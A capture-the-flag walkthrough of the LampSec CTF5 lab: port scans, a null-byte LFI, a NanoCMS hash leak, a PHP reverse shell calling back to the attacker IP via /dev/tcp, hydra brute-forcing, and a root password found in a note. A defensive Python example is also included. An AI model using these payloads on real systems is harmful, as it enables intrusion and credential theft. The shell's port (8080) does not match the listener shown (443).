[vulnhub] LampSec-CTF5


Information Gathering

nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 15:38 CST
Nmap scan report for 192.168.56.1
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.56.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:EC:CE:9E (VMware)
Nmap scan report for 192.168.56.139
Host is up (0.00063s latency).
MAC Address: 00:0C:29:7D:00:15 (VMware)
Nmap scan report for 192.168.56.254
Host is up (0.00042s latency).
MAC Address: 00:50:56:FE:21:A5 (VMware)
Nmap scan report for 192.168.56.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.08 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 15:40 CST
Nmap scan report for 192.168.56.139
Host is up (0.0017s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcp open mysql
53728/tcp open unknown
MAC Address: 00:0C:29:7D:00:15 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.57 seconds

So many open ports, so many possibilities.
Probably the most useful attack vectors: 80 (web), 139 & 445 (Samba).
After that: 53728, 901, 25, 110, 111.
The rest can be looked at last.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -p- --min-rate=10000 192.168.56.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 15:48 CST
Warning: 192.168.56.139 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.139
Host is up (0.0014s latency).
Not shown: 65454 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT STATE SERVICE
111/udp open rpcbind
5353/udp open zeroconf
32768/udp open omad
MAC Address: 00:0C:29:7D:00:15 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.70 second

All worth a look.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,5353,32768,53728 192.168.56.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 15:54 CST
Nmap scan report for 192.168.56.139
Host is up (0.00098s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7 (protocol 2.0)
25/tcp open smtp Sendmail 8.14.1/8.14.1
80/tcp open http Apache httpd 2.2.6 ((Fedora))
110/tcp open pop3 ipop3d 2006k.101
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp open imap University of Washington IMAP imapd 2006k.396 (time zone: -0400)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
3306/tcp open mysql MySQL 5.0.45
5353/tcp closed mdns
32768/tcp closed filenet-tms
53728/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:7D:00:15 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Service Info: Hosts: localhost.localdomain, 192.168.56.139; OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln 192.168.56.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 15:55 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.139
Host is up (0.0014s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.139
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.139:80/?page=contact
| Form id:
| Form action: ?page=contact
|
| Path: http://192.168.56.139:80/events/
| Form id: user-login-form
| Form action: /events/?q=node&destination=node
|
| Path: http://192.168.56.139:80/events/?q=user/register
| Form id: user-register
| Form action: /events/?q=user/register
|
| Path: http://192.168.56.139:80/events/?q=user/password
| Form id: user-pass
| Form action: /events/?q=user/password
|
| Path: http://192.168.56.139:80/events/?q=event/2009/04/29
| Form id: event-taxonomy-filter-form
| Form action: /events/?q=event/2009/04/29
|
| Path: http://192.168.56.139:80/events/?q=event/2009/04/29
| Form id: event-type-filter-form
| Form action: /events/?q=event/2009/04/29
|
| Path: http://192.168.56.139:80/events/?q=event/2009/04/29
| Form id: user-login-form
| Form action: /events/?q=event/2009/04/29&destination=event%2F2009%2F04%2F29
|
| Path: http://192.168.56.139:80/events/?q=event/2023/04/26/month
| Form id: event-taxonomy-filter-form
| Form action: /events/?q=event/2023/04/26/month
|
| Path: http://192.168.56.139:80/events/?q=event/2023/04/26/month
| Form id: event-type-filter-form
| Form action: /events/?q=event/2023/04/26/month
|
| Path: http://192.168.56.139:80/events/?q=event/2023/04/26/month
| Form id: user-login-form
| Form action: /events/?q=event/2023/04/26/month&destination=event%2F2023%2F04%2F26%2Fmonth
|
| Path: http://192.168.56.139:80/events/?q=event
| Form id: event-taxonomy-filter-form
| Form action: /events/?q=event
|
| Path: http://192.168.56.139:80/events/?q=event
| Form id: event-type-filter-form
| Form action: /events/?q=event
|
| Path: http://192.168.56.139:80/events/?q=event
| Form id: user-login-form
| Form action: /events/?q=event&destination=event
|
| Path: http://192.168.56.139:80/events/?q=event/2023/03/01/month/all/all/1
| Form id: event-taxonomy-filter-form
| Form action: /events/?q=event/2023/03/01/month/all/all/1
|
| Path: http://192.168.56.139:80/events/?q=event/2023/03/01/month/all/all/1
| Form id: event-type-filter-form
| Form action: /events/?q=event/2023/03/01/month/all/all/1
|
| Path: http://192.168.56.139:80/events/?q=event/2023/03/01/month/all/all/1
| Form id: user-login-form
| Form action: /events/?q=event/2023/03/01/month/all/all/1&destination=event%2F2023%2F03%2F01%2Fmonth%2Fall%2Fall%2F1
|
| Path: http://192.168.56.139:80/events/?q=node&destination=node
| Form id: user-login-form
| Form action: /events/?q=node&destination=node%3Famp%253Bdestination%3Dnode
|
| Path: http://192.168.56.139:80/events/?q=blog
| Form id: user-login-form
| Form action: /events/?q=blog&destination=blog
|
| Path: http://192.168.56.139:80/events/?q=comment/reply/2
| Form id: comment-form
| Form action: /events/?q=comment/reply/2
|
| Path: http://192.168.56.139:80/events/?q=comment/reply/2
| Form id: user-login-form
| Form action: /events/?q=comment/reply/2&destination=comment%2Freply%2F2
|
| Path: http://192.168.56.139:80/events/?q=node/2
| Form id: user-login-form
| Form action: /events/?q=node/2&destination=node%2F2
|
| Path: http://192.168.56.139:80/events/?q=blog/1
| Form id: user-login-form
|_ Form action: /events/?q=blog/1&destination=blog%2F1
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
| /info.php: Possible information file
| /phpmyadmin/: phpMyAdmin
| /squirrelmail/src/login.php: squirrelmail version 1.4.11-1.fc8
| /squirrelmail/images/sm_logo.png: SquirrelMail
| /icons/: Potentially interesting folder w/ directory listing
|_ /inc/: Potentially interesting folder
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
|_http-trace: TRACE is enabled
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.56.139:80/?page=contact%27%20OR%20sqlspider
| http://192.168.56.139:80/?page=about%27%20OR%20sqlspider
| http://192.168.56.139:80/?page=contact%27%20OR%20sqlspider
| http://192.168.56.139:80/?page=about%27%20OR%20sqlspider
| http://192.168.56.139:80/?page=contact%27%20OR%20sqlspider
| http://192.168.56.139:80/?page=about%27%20OR%20sqlspider
| http://192.168.56.139:80/?page=contact%27%20OR%20sqlspider
| http://192.168.56.139:80/?page=about%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|_ http://192.168.56.139:80/events/?q=event%2Fical%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:7D:00:15 (VMware)

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 170.56 seconds

The http-enum and http-sql-injection results are the interesting parts. I will focus on those later.

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf5/workSpace]
└─$ sudo nikto -h 192.168.56.139
[sudo] password for kali:
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.139
+ Target Hostname: 192.168.56.139
+ Target Port: 80
+ Start Time: 2023-04-26 16:29:26 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ /: Retrieved x-powered-by header: PHP/5.2.4.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /index.php: PHP include error may indicate local or remote file inclusion is possible.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpmyadmin/ChangeLog: Server may leak inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 558008, size: 22676, mtime: Tue Aug 21 10:59:12 2029. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /mail/src/read_body.php: Cookie SQMSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /mail/src/read_body.php: SquirrelMail found.
+ /squirrelmail/src/read_body.php: SquirrelMail found.
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /phpmyadmin/: phpMyAdmin directory found.
+ /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 26 item(s) reported on remote host
+ End Time: 2023-04-26 16:29:51 (GMT8) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Exploit

RFI(F)

Earlier, nikto reported that /info.php?file= might allow remote file inclusion; actually trying it showed that it does not work.

SQLi(F)

Next, SQL injection; if it could hand over login credentials directly, that would be ideal.
First ran sqlmap against [http://192.168.56.139:80/events/?q=event%2Fical](http://192.168.56.139:80/events/?q=event%2Fical): no injection point found.
Checking it manually showed that the page just serves a file download.
Then ran sqlmap against [http://192.168.56.139:80/?page=contact](http://192.168.56.139:80/?page=contact): still no injection point.

LFI(F)

Requesting the page parameter with a traversal path produces an error; the error message is as follows:

sudo curl 'http://192.168.56.139/?page=../../../../../../../etc/passwd'
<div id="main">

<b>Warning</b>: include_once(inc/../../../../../../../etc/passwd.php) [<a href='function.include-once'>function.include-once</a>]: failed to open stream: No such file or directory in <b>/var/www/html/index.php</b> on line <b>6</b>



<b>Warning</b>: include_once() [<a href='function.include'>function.include</a>]: Failed opening 'inc/../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in <b>/var/www/html/index.php</b> on line <b>6</b>

</div>

Clearly a file inclusion vulnerability. Since ".php" is appended to the parameter, and the phpinfo page we looked at earlier shows this PHP version is affected by null-byte truncation, we simply truncate the suffix with %00.

# http://192.168.56.139/?page=../../../../../../../etc/passwd%00

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash

We can read /etc/passwd, but unfortunately not shadow, and attempts to read configuration files came up empty. Set this vulnerability aside for now.
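To make the truncation concrete, here is an added example (my own code, not from the page or the target) that models the include seen in the warning above, the fixed resolver a maintainer would write, and a log check for the pattern. The include statement, the "inc" directory and the allowlist of page names are inferred from the error message and are assumptions.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Paths taken from the warning in the curl output above; the include statement
# include_once("inc/" . $_GET['page'] . ".php") is inferred from it (assumption).
WEBROOT = "/var/www/html"
PAGE_DIR = "inc"
# Assumed allowlist: the page only shows ?page=about and ?page=contact in use.
ALLOWED_PAGES = ("about", "contact")


def naive_include_path(page: str) -> str:
    """Model the vulnerable include on a PHP build affected by null-byte truncation.

    PHP before 5.3.4 handed the concatenated file name to a C open() call, which
    stops at the first NUL byte, so %00 in the URL silently discards the ".php"
    suffix. The result is normalised lexically, as the filesystem would resolve it.
    """
    raw = f"{PAGE_DIR}/{page}.php"
    truncated = raw.split("\x00", 1)[0]  # C-string semantics: text after NUL is lost
    return posixpath.normpath(posixpath.join(WEBROOT, truncated))


def hardened_include_path(page: str):
    """Resolve a page name safely; return None for anything that is not a known page.

    Three independent checks: reject NUL bytes and path separators outright,
    require the name to be on an explicit allowlist, and confirm the normalised
    path is still inside the intended include directory.
    """
    if not page or "\x00" in page or "/" in page or "\\" in page:
        return None
    if page not in ALLOWED_PAGES:
        return None
    base = posixpath.join(WEBROOT, PAGE_DIR)
    candidate = posixpath.normpath(posixpath.join(base, page + ".php"))
    if posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


def lfi_indicators(request_target: str) -> list:
    """Names of query parameters whose decoded value carries traversal or NUL markers.

    Intended for scanning the request-line field of Apache access logs for
    attempts like the one shown above.
    """
    hits = []
    query = urlsplit(request_target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)  # parse_qs decoded once; this also catches %2500
            if "\x00" in decoded or ".." in decoded.split("/"):
                hits.append(name)
                break
    return hits


if __name__ == "__main__":
    probe = "../../../../../../../etc/passwd\x00"
    print("naive    :", naive_include_path(probe))      # /etc/passwd
    print("hardened :", hardened_include_path(probe))   # None
    print("flagged  :", lfi_indicators("/?page=../../../../../../../etc/passwd%00"))
```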

Samba(F)

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf5/workSpace]
└─$ sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.56.139
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 16:54 CST
Nmap scan report for 192.168.56.139
Host is up (0.00053s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:7D:00:15 (VMware)

Host script results:
| smb-enum-shares:
| account_used: <blank>
| \\192.168.56.139\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Samba Server Version 3.0.26a-6.fc8)
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
|_ Anonymous access: READ/WRITE
| smb-enum-users:
| LOCALHOST\amy (RID: 2008)
| Full name: Amy Pendelton
| Flags: Normal user account
| LOCALHOST\andy (RID: 2004)
| Full name: Andrew Carp
| Flags: Normal user account
| LOCALHOST\jennifer (RID: 2002)
| Full name: Jennifer Sea
| Flags: Normal user account
| LOCALHOST\loren (RID: 2006)
| Full name: Loren Felt
| Flags: Normal user account
| LOCALHOST\patrick (RID: 2000)
| Full name: Patrick Fair
|_ Flags: Normal user account

Nmap done: 1 IP address (1 host up) scanned in 4.12 seconds

Now the Samba service: the scan turned up the user names and the share path.
Scan again with smbmap.

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf5/workSpace]
└─$ smbmap -H 192.168.56.139
[+] IP: 192.168.56.139:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
homes NO ACCESS Home Directories
IPC$ NO ACCESS IPC Service (Samba Server Version 3.0.26a-6.fc8)

Well, everything is NO ACCESS. Dead end.

# Not used
hydra -l andy -P /usr/share/wordlists/rockyou.txt 192.168.56.139 http-post-form "/~andy/data/nanoadmin.php:SQMSESSID=b2pdpdkh3rlkvukqr0jbssur30; PHPSESSID=7rlrvoh72sto2t935mmr4l99e0; SESS100a7dde408e54bc0d12aead519a7cc5=i1u9c4qe9er2gu0r1ou19tqhj1
;user=^USER^&pass=^PASS^:F=wrong Username or Password"


Cookie: SQMSESSID=b2pdpdkh3rlkvukqr0jbssur30; PHPSESSID=7rlrvoh72sto2t935mmr4l99e0; SESS100a7dde408e54bc0d12aead519a7cc5=i1u9c4qe9er2gu0r1ou19tqhj1
Upgrade-Insecure-Requests: 1
user=1111&pass=2222

NanoCMS(S)

On the admin login page we can see the CMS is NanoCMS. Searching exploit-db turns up only an RCE that requires an already logged-in user.
Searching a search engine as well (search in bing: nanocms exploit) shows that NanoCMS has a data-disclosure vulnerability.
(screenshot: query-nano-exp.png)
We don't know the NanoCMS version, but we'll try it anyway; nothing to lose.

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf5/workSpace]
└─$ curl http://192.168.56.139/~andy/data/pagesdata.txt
a:12:{s:8:"homepage";s:1:"1";s:10:"links_cats";a:4:{s:7:"sidebar";a:2:{i:0;i:1;i:1;i:4;}s:11:"other-pages";a:0:{}s:14:"top-navigation";a:2:{i:0;s:1:"1";i:1;s:1:"4";}s:12:"Footer-Right";a:2:{i:0;s:1:"1";i:1;s:1:"4";}}s:5:"slugs";a:2:{i:1;s:4:"home";i:4;s:7:"contact";}s:6:"titles";a:2:{i:1;s:4:"Home";i:4;s:7:"Contact";}s:10:"slug_count";i:12;s:8:"settings";a:3:{s:19:"index-last-modified";i:1234513760;s:18:"def-template-areas";a:4:{i:0;s:12:"website name";i:2;s:14:"website slogan";i:3;s:16:"below navigation";i:4;s:16:"copyright notice";}s:18:"def-template-links";a:2:{i:0;s:14:"top-navigation";i:1;s:12:"Footer-Right";}}s:13:"active-tweaks";a:2:{i:0;s:7:"deutsch";i:1;s:19:"language-pack-tweak";}s:11:"lang-select";s:7:"english";s:6:"seourl";s:1:"0";s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

It actually dumped the username and password.
Threw the MD5 password hash straight into a cracker.
(screenshot: md5pass-crack.png)
OK
Log in to the admin panel.
(screenshot: nano-admin-panel.png)
OK
After looking around, I found a place where pages can be edited and decided to quietly insert a reverse shell into the contact page.
(screenshot: webshell-insert.png)

<?php exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.132/8080 0>&1'") ?>

Got a shell.

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf5/workSpace]
└─$ sudo nc -lvp 443
listening on [any] 443 ...
192.168.56.139: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.132] from (UNKNOWN) [192.168.56.139] 54757
bash: no job control in this shell
bash-3.2$ whoami
apache
bash-3.2$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:7d:00:15 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.139/24 brd 192.168.56.255 scope global eth1
inet6 fe80::20c:29ff:fe7d:15/64 scope link
valid_lft forever preferred_lft forever
bash-3.2$

Privilege Escalation

sudo -l needs a password.

find / -type f -perm -04000 -ls 2>/dev/null
Nothing of value; at kept failing; nothing else usable.

bash-3.2$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly

Went through the cron directories one by one and studied a job in /etc/cron.daily; found nothing exploitable.

Uploaded lse.sh and ran it; this shell does not support colour escape sequences, so the output was almost unreadable...
Switched to linpeas, which displays colours fine. Still the better tool.
Unfortunately it still gave no particularly useful information. The system version is very old, so a kernel exploit would probably work, but that is too unstable, so I won't try it.

Looked at a video walkthrough for ideas:

There are so many users on the system that some of them may have left credentials in their files. So why not give it a try?
In a multi-user environment, chances are someone has left a trail; trying costs nothing.

So we recursively and case-insensitively search the files under /home for the string "pass":

# -R recurse, -i ignore case
grep -R -i pass /home/* 2>/dev/null
/home/andy/public_html/data/admin-design/loginform.php:    <tr><td><?php _lt('Password'); ?></td><td><input type='password' name='pass'></td></tr>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
/home/patrick/.tomboy.log:12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...
# cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
<title>Root password</title>
<text xml:space="preserve"><note-content version="0.1">Root password

Root password

50$cent</note-content></text>
<last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
<create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
<cursor-position>15</cursor-position>
<width>450</width>
<height>360</height>
<x>0</x>
<y>0</y>
<open-on-startup>False</open-on-startup>
</note>

Password found, and it is the root password, no less. Absurd.

bash-3.2$ su
su
Password: 50$cent

[root@localhost bin]# whoami
whoami
root
[root@localhost bin]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:7d:00:15 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.139/24 brd 192.168.56.255 scope global eth1
inet6 fe80::20c:29ff:fe7d:15/64 scope link
valid_lft forever preferred_lft forever
[root@localhost bin]#

Done.

Addendum

Actually, my SQLi testing was not careful enough; I only thought about the parameters in the URL. Why keep fixating on GET? I really should have thought about POST.
On the 192.168.56.139/list/ page, the four form fields are vulnerable to SQLi; adding a ' was enough to reveal it.

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf5/workSpace]
└─$ sudo sqlmap -u http://192.168.56.139/list/ --data 'name=1&email=&phone=&org='
___
__H__
___ ___["]_____ ___ ___ {1.7.2#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:16:57 /2023-04-27/

[15:16:57] [WARNING] provided value for parameter 'email' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:16:57] [WARNING] provided value for parameter 'phone' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:16:57] [WARNING] provided value for parameter 'org' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
